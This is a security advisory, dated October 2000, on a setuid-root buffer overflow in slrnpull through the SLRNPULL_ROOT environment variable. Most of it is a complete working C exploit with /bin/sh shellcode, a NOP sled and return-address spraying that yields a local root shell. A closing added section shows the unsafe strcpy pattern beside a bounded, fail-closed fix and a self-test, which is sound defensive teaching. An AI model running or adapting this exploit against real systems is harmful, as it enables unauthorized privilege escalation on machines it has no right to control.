Slrnpull exploit code has been released (SLRNPULL_ROOT)
20 Oct. 2000
Summary
Slrnpull pulls news posts from an NNTP news server so that slrn can be used as an offline newsreader. A security vulnerability in the product allows local users to overflow one of the environment variables it reads (SLRNPULL_ROOT) and cause the application to execute arbitrary code. Since the program is installed setuid root, elevated privileges can be gained. The exploit code below can be used to test for this problem.
Credit:
The information has been provided by Vade79.
Exploit:
/* (linux)slrnpull[slrn_v0.9.6.2-] buffer overflow, by v9[v9@fakehalo.org]. i
made this after i viewed Michal Zalewski's "rh 6.2 - gid compromises, etc"
(posted: Wed Jun 21 2000 06:54:08) text on bugtraq. according to his text
slrnpull among other programs is exploitable. so, i downloaded the source
and scanned through it to write a little exploit for it.
note: there didn't appear to be any set*gid() code in the source, except
mentions of it, so i'm just using generic (non-set*id) shellcode.
also, i just plucked one of the ways to overflow this: -d(spooldir)
option, NNTPSERVER environment variable, etc. overflow. the main slrn
program has many overflows as well. offsets should range from 1200
to 2900. (roughly)
*/
#include <stdio.h>  // printf.
#include <stdlib.h> // atoi, setenv, system, exit.
#include <string.h> // strlen, memcpy.
#define FILENAME "slrnpull" // (which) slrnpull filename to execute.
#define BUFFER 2048 // buffer size used to overflow.
#define DEFAULT_OFFSET 1750 // default offset, argv option.
#define DEFAULT_ALIGN 1 // default align, argv option.
static char exec[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still 01.
long sp(void){__asm__("movl %esp,%eax");} // where offset is add/sub from; result is left in %eax (no C return statement).
void execute(){
char cmd[256];
snprintf(cmd,256,"`which %s`",FILENAME);
system(cmd);
}
int main(int argc,char **argv){
char bof[BUFFER+4]; // slack: the fill loops below write up to 3 bytes past BUFFER, and the terminator goes at bof[BUFFER].
int i,offset,align;
long ret;
printf("[ slrnpull[slrn_v0.9.6.2-] local buffer overflow, by: v9[v9@fakehalo.o"
"rg]. ]\n");
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** invalid alignment value(%s), using internal default: %d. (0-3)\n"
,argv[2],DEFAULT_ALIGN);
align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
ret=(sp()+offset);
printf("[ return address: 0x%lx, offset: %d, address alignment: %d. ]\n"
,ret,offset,align);
for(i=align;i<BUFFER;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(BUFFER-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
bof[BUFFER]='\0';
setenv("SLRNPULL_ROOT",bof,1);
execute();
exit(0);
}
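The bug the summary describes is the classic one: a setuid program copies an environment variable into a fixed-size stack buffer without checking its length. The following is an added example, written for this page and not taken from slrnpull, showing the unsafe pattern next to a bounded version that rejects an oversized or non-absolute value instead of truncating or overflowing. SPOOL_ROOT_MAX, set_spool_root and load_spool_root_from_env are hypothetical names chosen here; the 2048-byte test value mirrors the BUFFER size used by the exploit above and is constructed inline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical limit for the spool directory path (not slrnpull's real value). */
#define SPOOL_ROOT_MAX 256

/* Unsafe pattern, shown for contrast only and never called here:
   strcpy() has no bound, so a value longer than the destination
   overwrites whatever follows it on the stack, including the saved
   return address the exploit above targets. */
static void unsafe_set_root(char *root, const char *value)
{
    strcpy(root, value);
}

/* Hardened form: fails closed when the value does not fit (terminator
   included) or is not an absolute path. Returns 0 on success, -1 on
   rejection. The length scan is itself bounded so it never reads past
   rootlen bytes of an attacker-controlled string. */
int set_spool_root(char *root, size_t rootlen, const char *value)
{
    size_t n = 0;
    if (value == NULL || rootlen == 0)
        return -1;
    while (n < rootlen && value[n] != '\0')
        n++;
    if (n >= rootlen)          /* no room for the NUL: too long, refuse it */
        return -1;
    if (value[0] != '/')       /* spool root must be an absolute path */
        return -1;
    memcpy(root, value, n + 1);
    return 0;
}

/* Reads the variable by name, the way a program would consume
   SLRNPULL_ROOT, and applies the same checks. */
int load_spool_root_from_env(const char *name, char *root, size_t rootlen)
{
    const char *v = getenv(name);
    if (v == NULL)
        return -1;
    return set_spool_root(root, rootlen, v);
}

/* Self-check with constructed inputs: a sane path, and a 2048-byte value
   of the kind the exploit above places in the environment. Returns 1 when
   the good value is accepted unchanged and the oversized one is refused. */
int demo(void)
{
    char root[SPOOL_ROOT_MAX];
    char big[2048 + 1];               /* constructed oversized value */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    int ok = set_spool_root(root, sizeof root, "/var/spool/slrnpull");
    int rejected = set_spool_root(root, sizeof root, big);
    return ok == 0 && rejected == -1 && strcmp(root, "/var/spool/slrnpull") == 0;
}

int main(void)
{
    (void)unsafe_set_root;            /* referenced only so it is not flagged as unused */
    printf("bounded environment copy: %s\n", demo() ? "ok" : "FAILED");
    return demo() ? 0 : 1;
}
```

Rejecting rather than truncating matters here: a silently shortened spool path could point the program at a different directory while still running as root, so the safe choice for a privileged tool is to refuse the value and exit.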